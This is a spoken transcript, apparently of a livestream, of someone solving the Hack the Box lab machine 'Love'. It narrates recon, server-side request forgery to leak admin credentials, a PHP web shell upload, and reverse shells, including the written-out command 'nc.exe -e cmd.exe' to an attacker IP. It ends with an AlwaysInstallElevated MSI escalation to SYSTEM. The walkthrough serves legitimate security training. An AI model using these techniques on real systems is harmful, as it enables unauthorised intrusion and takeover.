All right, so I'm coming on today to do the free retired machine from Hack the Box. The first one is Love. It's an easy machine. Looks like it's labeled as a Windows. I'm starting to produce content a little more again, hoping this will be the first of many eventual streams, but more importantly, different video topics as we come forward with this process. Why don't we just get right into it, and I will share out my screen. I'm going to start from square one. You can see I haven't really done anything with this. I actually haven't even touched the box. It's been a bit since I've really tried to do anything with Hack the Box. I've just recently started making my way back into it. So we're going to do Love today. Now for the setup purposes, I don't even know if anyone's watching at the moment, but what I'll be doing is setting this up. And if you have any needs or concerns about the stream, comment on it. Let me know so that I can edit it in the future and make things better. Spawn the box. I'm going to try and go without any kind of walkthrough today. I think I've dusted off the cobwebs to a point where I don't really need that anymore. But we'll see what's going on. I'm looking to the right. My monitor is over here to monitor the stream. Monitor over here is the box. Be joined by my nice nondescript can of beverage. And here we go. Have our IP address, so start the initial bits. My bad. So first thing I'm going to do is add this to the host file. This is because when you do things, when we end up looking for things like vhosts, subdomains, anything like that, we want to have this here. Also, frequently, I've had issues in the past where if you don't have this in your host file, the website won't load properly. First things first, I'm going to, on my other screen, open up my personal cheat sheet where I keep my usual recon commands. Don't mind me, I was doing schooled earlier. We'll do love.hackthebox. So I'm going to start my nmap, and then while that's running, might as well just see if I got anything here. So right off the bat, we've got some kind of voting system. Not a lot in the way of identification on this. Let's view the source code. See if there's anything here. Using PHP. Right now, nothing's really jumping out at me here. It looks like I'm going to need some kind of ID and password. Let's just, right off the bat, admin password. Nothing that I could really think of in the way of default creds because I don't know what this is currently. Let's go back to nmap, see if we've got anything popping up here. Since nmap's running, I might as well go bust. So we know that port 80 currently has something going there currently, which means that I want to set something up to do a directory crawl. What I'm doing right now is I'm looking for PHP and text files as well as just different directories here. So you can see a few things that are coming off right immediately. We have an admin, we have a plugins, potentially something we can exploit later if we can get a malicious plugin onto whatever we're working on. Images, admin, plugin. It's a good list so far. In my third window, or fourth window at this point, I'm going to go look for subdomains. So ffuf, I don't know if this is the one that Hack4Box has a module on currently, but it is one of the better, I think, subdomain fuzzers because frequently I can just pop and play with this command. I'm going to actually get rid of this though, because what that is doing is filtering out responses of different size. So I'm going to set this up and see how we have size 4388 here, really just shrugging away all of our responses. I'm going to get rid of that. I'm going to do -FW, filter of a word size 4388. That didn't work. Why didn't that work? Probably because I'm getting responses here. Interesting. Let's just see what comes up. This is happening. So I was doing a filter by words. 654 is what I needed. What I should have been doing is a filter by size, 4388. And immediately what I'm seeing now is that staging is the one that I'm looking for. So we have a subdomain, at least one. Go back and check nmap now. And I think it's about time we maybe thought about updating our notes. Quite a bit coming out here. Patchy. So we've got 80, 135, 139, 443. And what's ironic here is if I had just looked at this 2 seconds ago, maybe 2 minutes ago, wherever, I would have seen that this SSL cert is assigned to staging.love.hackbox. So while ffuf did find staging.love.hackbox, this is another way I think I could have gotten it. I don't think that it's good practice just to do that, though. Organizations will sometimes have multiple subdomains, and I think if you want to stick to the real world scenario here, you'd want to enumerate what you can out of something like ffuf, gobuster even. There are multiple ways for you to get that. 445, so maybe we can see if there's anything here. Quite a few filtered ports. We got 5040, 7680, couple RPC ports. So why don't we pop off? At this point, we'll try SMB client to ping 445, see if there's anything there. We've got a good OS version here. If all else fails, we'll come back to this, see if there's any vulnerabilities we know here. There's a few things that are jumping out at me. I think I'm going to start by doing enum for Linux, which is the Windows enumerator script that you can use to get some basic information. Going to then, in a separate tab, do an SMB client -L, see if I can get anything in the way of architecture there. Why don't we just do that now? Why don't we just see what we can do for love.hackbox. Access denied, so that's probably not going to do much of anything. Start here. While that's going, I know I said I was going to update my notes, but I am terrible at updating my notes. So here's the thing with Hack4Box. I don't like that I can't just What's happening here? Oh. All right, here's another little fun thing. Don't forget to add your subdomain to your Etsy hosts file. And don't forget to properly... I do not have permission to access that on port 443. Let's pop it into port 80, and we have some kind of file scanner. File scanner will scan your files with recognized malware signature. Our purpose is to provide an easy online file scanner to protect the internet folks from well-known malware, viruses, and worms. So I could, at this point, stick gobuster on this, but I don't think I'm going to. I think I'm going to play around with it. I think that if they wanted us to do that, then it would have been a bit of a more expansive site. So we have home and demo. It seems to be demo is beta.php file to scan. Why don't we do this? Why don't we say nano test.txt tester.kill me. So what I'm doing right now is I'm creating a file and hosting it on port 80 on my local machine. I'm going to test and see if I can read that file with this. So let's do 10.10.14.91 / tester.txt. That was what I called it, right? Tester? No, just test. Interesting. So I can reach out back to my own machine. I wonder if I can see anything on that side. All right, so this looks like the page here. So I can get it to scan the individual ports on this. Let's see what we go. So let's try 127.001.43. Okay. Let's see if that made it there. I'd be interested to see if I can, if that is only red. I don't think it was actually got. No, they did. They got it. So it's stored on their server somewhere now. Let's go back up to our nmap. I want to see if I can find. So I'm not going to, since it's looking for links, I'm not going to be able to do anything with 135, 139, 445. I'm looking for anything that I might be able to scan that is on that side. So why don't I try this first? I can see that we have port 5000 open. It's forbidden, so I don't think I'm going to be able to actually do anything with a browser on that, but what if I try it here? What are you? Power dashboard. Home demo. Admin at love is in the air. Let's make that right into our notes. So that is vote admin creds, which means I think that should be what is happening there. That didn't like to play. I think what I'm saying there is that that should be the credentials to this page over here for voting system. So we go admin. All right, so something's wonky with that copy and paste. I thought that was happening. Interesting. Can't find voter with the ID. Oh, I had a viewer for a second. Let's try that again. See if there's one colon. Admin at Love is in the Air. Didn't work here. Because it's looking for a voter ID, it's not looking for a username. Back to our notes. So I'm just making a note for myself here. I wonder if I'll be able to get into SMB with that username and credential. We'll hold off on that for a minute. Nothing there. Ah. What better place to use admin credentials? Jeez. Jeez Louise. But admin. Interesting. Okay, I picked up the copy and paste on that is bullshit. I apologize for swearing. Thank you. So, I keep messing up something with that copy and paste somehow. I mean, I say I keep messing it up, but really it's a machine. That time it added a space at the end of it. So, I'm going to just try and bring this back over to my notes one more time. Okay, for whatever reason, that one worked. All right, I'm in. I have, this is a potential username, so I'm just going to bring that in there. Source code star. What do we have here? Nothing in the way of info here. Voters, new voter, test, testerson, password testerson123, save. So I was able to get that in there. the profile image can be accessed, and I can edit that, which is interesting to me. So I'm not really seeing anything that... Ooh, hi, I've got a little guest down here trying to make his way onto the screen. His name's Waffles, but you can't see him from up here. So my gut instinct at this point is to try to get something uploaded here. And all I seem to be able to do is either enter these first or last names or upload a picture. First, let's look into source. Maybe this is a platform that I can do something with. I'm pretty sure it's not something I should... Well, that's got to be what we already know. There's no way they would just give us a password hash and a source code. All right, I don't think that this is really going to come with anything that I can see here. Again, I don't have any viewers at the moment, so I guess that is what it is. I guess let's see what we can do. Let's try to find... Let's try to upload the test file as a photo. That'll kind of guide me as to where we can go next. Documents, hack the box, streaming, love, test. All right, my photo is a text file. So that means I could probably get some kind of web shell in here instead. Kali has a whole bunch of built-in shells. So I could go first shell, web shell, WordPress PH. Let's see what we got here. Let's try this one. User share London PHP shell. I've never used it, but it's a first time for everything. Oh, hello. Thank you. I think it is interesting. So we're going to go to user, share, try this again. Let's go to user, share, come on down to here. There we go. PHP shell update. So that worked. It's there. Now what's going to happen if I view this? All right, so that shell's not working. Let's try this PHP web shell. Google is your friend. Very simple but functional web shell. All right, let's do this. Let's grab this. This looks interesting. What I'm really doing right now is not something I preach to a lot of people, which is I am just grabbing the first thing that I see. The reason I don't do that a lot is because you never know what you're actually going to get with that. If you just download scripts willy-nilly, sometimes it might be something that is a little bit malicious, but this is not something that I'm running on my local machine. I'm downloading it and I'm not executing it on my machine. I'm executing it on the Hack the Box machine. So for all intents and purposes here, it shouldn't be a problem. Let's upload that. And look at that. I have a shell. So let's see, who am I? And I have a user, Phoebe. So I'm going to bring that back to notes. I have two potential users now, Neovic and Phoebe. In all likelihood, Neovic is not something that I care about here. I'm probably looking more towards what Phoebe's got. So what I'm going to do is see about a reverse. Actually, why don't we try... I'm trying to think right now how I should best get a reverse shell here. So you can see the PowerShell works. What I can probably do currently is maybe set up a PowerShell reverse shell back to my machine. So I'm going to try to do that, and you'll have to hold on for 1 second while I go get my one-liner. Reverse shell one-liner, I could use that. I'm just going to pull it up on this screen. Why don't I do this as well? I'm going to turn this into my listener. NC MVLP. Why don't we set 8080 as that? Now I got to go in and adjust this PowerShell one-liner. I'm looking for where I've got the default IP and port. It's usually towards the beginning. Here we are. So 10, 10, 14, 91. And then I'll swap this out for 8080 and we'll see if I get shell. Here's a good clue. I think I might have gotten it. If you see this hovering back and forth, it's usually because the connection is still open. And you can see I have a connect here. Who am I? All right. All right, CD. I don't remember where they house it on Windows machines. It's either documents or desktop. But I'm betting we're about to get user. There it is. That is the first of the two flags. I'm going to give that probably a 2. It was fun. It wasn't anything super complex. I didn't really have to scratch my head about it. Any kind of mistake I made so far has just been on my own inability to look at things in detail. So I'll give it a 2, maybe a 1. It's not anywhere near the medium territory. I see we have someone who's let's see, Primal Victor. It has been a while. I'm back on. As you can see, I've got a bit of a change of background here. That I moved recently, so now that I have a better space for it, I'll be doing content more and more. And Virtual Vortex, this is going to be left up for later viewing because this is a retired machine. The big thing with Hack the Box is that typically they don't have you or don't give you permission to do their actual live machines. I thought this would be a good one to do because it is currently the free retired machine. And there is a bit of a delay, so I apologize, but that is just how it's going to go. So if you respond back to these, I may not see them right away. Now, we have user. I highly doubt. Sometimes the easy boxes will give you straight admin right away, but I don't think this is going to be one of them. See, we can't see anything here. So what I'm going to do is try to get winPEAS on the system. winPEAS is a privilege escalation script that you can run on Windows. And what it'll do is hopefully give us a bit of a clue as to where we might be able to go next. So I'm going to go to, let's see, is there a temp here? No. All right, there doesn't appear to be a temp directory. I'm going to go back to Phoebe. I'm going to go to, call it documents this time. And I'm going to go back and find my winPEAS. So I see I have winPEAS. I want to go over to winPEAS. I'm going to start by trying to upload the bat file. The kicker here is I'm currently, actually no, I'm using port 8080. I think I should be able to get, I should be able to serve this on port 80. I don't know. I don't think I can wget here. I'll try. All right, so PowerShell, I can never remember the two commands to actually pull a file in PowerShell. Here we go. So, interesting that it saw that. However, it didn't actually pull it. Or something interesting is happening here. All right, let's go back. Let's start with this. Use the web client to download it. I'm gonna have to specify where I'm gonna put it. There it is. So now I'll try. And this is what I was a little concerned about. I don't think it's going to run right on here. Give it a minute, see if I can do something. Sometimes when you have these reverse shells, it's not exactly a full shell and you get little issues like this where it's not going to run properly. Check my stream, make sure I'm still working on this. I've had this issue in the past, and I don't remember what the exact resolution was. I'm looking through my notes right now to see if I have anything from the last time I ran this. You know what? I'm going to restart the shell. I'm going to try. I'm going to try again and see if this time I can do it with the exe. So we'll do cd. I'm going to hope we're in a 64 environment. I'm just going to assume. Don't mind what I'm doing right now. I'm just chugging my way into here. Should relabel this to shell, relabel this to serve. Keep my stuff nice and organized so that I can tell people that I'm better than them. Let's get out of this. Let's move over to downloads this time. Get all the way up there. What am I serving? I am serving you. That did not go how I wanted it to. Users. Phoebe. Spot the mistake. Give you a hint. It's parenthetical. Oh wait, no, it's not. Why didn't that work? Check my serve. 404 file thought not found. So it's looking for winPEAS slash winPEAS 64. What? That's it. I don't know what prompted me to add that. Sometimes you fry your brain a little bit. There you are. That doesn't appear to be working either. Who does my graphics for snapshots? Are you talking about what's on my thumbnails and stuff? See if I can sign into chat. Or the corner in frame. All right, so that's not working. What I might try to do is I might try to bootleg my way into this cmd.exe. All right. I'm going to go really roundabout here. Someone on Fiverr did this a while back. If you give me a 1 minute, I'll plug them. Let me see if I still have the information. It's been a hot minute since I've been in. Let's see. Eight one oh. All right. I will tell you who did that in 1 second. Yeah, I definitely got it from a Fiverr account. Let me see if I can. So the Fiverr account is RUI Production. I'm not going to paste the full link. I imagine YouTube has some kind of protection around that. So what I'll do is I'll paste for username, not you. There you go. If you're interested, I highly recommend them. I can't say how happy I am with that. What I think I'm going to try and do real quick is a very roundabout way to get a decent shell. So I'm going to change what I'm serving up here. I'm going to go locate nc.exe, cd user share SQL apps. What I'm going to do here is I'm actually going to serve netcat to this guy and use netcat to serve a legitimate command.exe shell so that I can come back in and hopefully run winPEAS. So I should be able to piggyback off a web client that I've already got. There it is. Let's see. nc-e cmd.exe 10.10.14.91. And what port do I want to use here? Why don't I just serve it over SSL, see if anything happens with that. And then I'll do nc nvlp 443. I did that wrong because I was using nc, not nc.exe. nc.exe-ecmd.exe 10.10.14.91.443. Did not appear to work. What if I do this? cmd.exe, nc.exe-ecmd.exe 10.10.14.91.443. Doesn't appear to be working. A little perplexed by this. cmd.exe/c. Yeah, I thought that would be the case. It's going to run that. I've got to start that back up now. Thank you to the 3 people who are watching this. Oh no, did it delete? I get to re-upload my web shell. So this, browse, bring you back, update, view image. There we go. That should have done it. All right. So I am in here, winPEAS x64.exe. And there we go. It's running. Boy, that was a journey. And this is a lot of stuff. Tell you what, you've all earned this, the however many, 2 of you there are. Say hello to Waffles, the cyber kitty. Helps me every day at work. Helps me every night hacking. And we can see some interesting stuff. winPEAS I cannot just, I don't know. winPEAS is a hero. Got some .inis, xamp.ini. Let's see how far up this goes. I think my terminal should be able to give me quite a bit of this. winPEAS will tell you what's interesting in red. Sometimes that is a bit overwhelming. Like, what am I going to do exactly with all of this? I don't know. I don't even know that all of that can be done. Possible password file there. We have the hash for Phoebe, which I think interesting that it's there, not necessary for what we're doing currently. Because as of now, I don't need Phoebe's password. I think it's important that sometimes, I know this is not going to get a lot of views as an hour-long upload because no one wants to sit around for an hour long. But I think it's important if you're learning that you learn the failures as well as the successes. Every video that I've seen coming into this has always been, here's straight to the point how you hack this. And half the time when you're just starting out, you're going to run into issues like I did, and you're not going to know how to get out of them. And it's going to really, really make you feel bad. So I'm happy that I'm streaming this right now, that you can see my issues that I'm having with the box. All right, why don't we just scroll all the way up to the top if we can and see if there's anything interesting. Like I said, very, very lot of things to look at here. I don't know how much more I've got in me tonight. Might pause this and come back to it, but see if we can close this out with a quick escalation to admin. Any local account can be used for lateral movement. That's interesting. This is interesting. If you have an interpreter session, you can automate this technique using always install. I don't have an interpreter session. I try to figure out what I can without using Metasploit, especially since OSCP does not really want you using that. Let's look this up somewhere else. Let's look up. Although, is this just going to be it? Okay, so we'll do this. We'll do privesc, always install elevated. Red team notes. Just going to go and see what I can find here. We know it's already enabled because winPEAS told us this. Create an MS. You should be able to see that a little better now. So we're going to, it looks like we're going to use msfvenom here to create a payload that's going to be an MSI file that will install at an elevated privilege and get us a reverse shell back, is what I would assume. So let's start the process. Let's go back to my serve session. I'll keep it at port 1337. I'm a little skeptical, or I don't resent it, but I don't really love when people use delete port. But if this works, I'll be happy. So back to my shell. Ooh, this is going to be a tough one. I could... So the reason I'm a little... I could always go back. Let's see. Just gonna check something real quick. All right, so that's how I'll run that. I just want to make sure I had the proper command for running this. MSI exec appears to be what it's going to be. I'll need to set up a listener. How am I going to be setting this up? According to my serve, payload reverse TCP, I should be able to just set up NC NVLP 1337. So what I have to do now is I have to do okay. Let's start from the beginning on this one. Go back. Go back. Let's grab my web client. Let's grab first half of this. Oh crap. Yeah, you know what? Let's do it here. Let's see if I can get it here. I am going to serve always install. All right, that didn't appear to take. What happened? I didn't see it. 10, 10, 1491. All right. Try this again. I suspect I typoed something somewhere. C:\users /phobie /downloads /always install elevated.msi. There it is. Now, how did this work? I'm going to be running MSI. Here's a little half pro tip for you. If you need to look at something you don't want to go back and forth, that should do it. I'm hoping this will get it. Oh, would you look at that? Who am I? Who am I? System. And time to claim my loot. There she goes. I really like that machine. That was great. I'd say I don't know that it's really real life applicable. I guess at the start, it kind of was. Moving up, it's tough because I want to say that it is kind of real life applicable here, especially towards a priv-esque, because that is a very real life thing, is to exploit MSIs. But you know what? It was a nice box. I don't think it really had much to do with common vulnerabilities, but we'll give it a 6 and 5. There wasn't 5 and 5. There wasn't a huge amount of enumeration here. There wasn't a really large amount that we needed to filter back and forth. When I think of high amounts of enumeration, I think of something that we'll need to typically break out cool with, something that takes quite a bit, maybe even a little bit of OSINT. But, you know, I think that for the first stream back, that went pretty well. I really liked that box. I'll keep this up on my channel. I know that, who was it that asked about that virtual Vortex? Yes, I'm going to keep that on the channel. And I'll hopefully get a proper thumbnail up for it soon. Maybe cut down the beginning few minutes where it's just me figuring out the stream. I don't have any kind of schedule for this, but I will be getting videos back up there. I recently did all of the live boxes up through the medium machines. So as those come retired, I'll hopefully put those out. If there's a box you'd like me to do, feel free to leave it here and I'll take it into consideration. If it's not something I've already done, maybe I'll just revisit it because, you know, sometimes you spend so long away from this stuff that coming at it a year later means that it's basically a fresh machine. So let me know. I look forward to giving you all some content that you want and that I enjoy producing.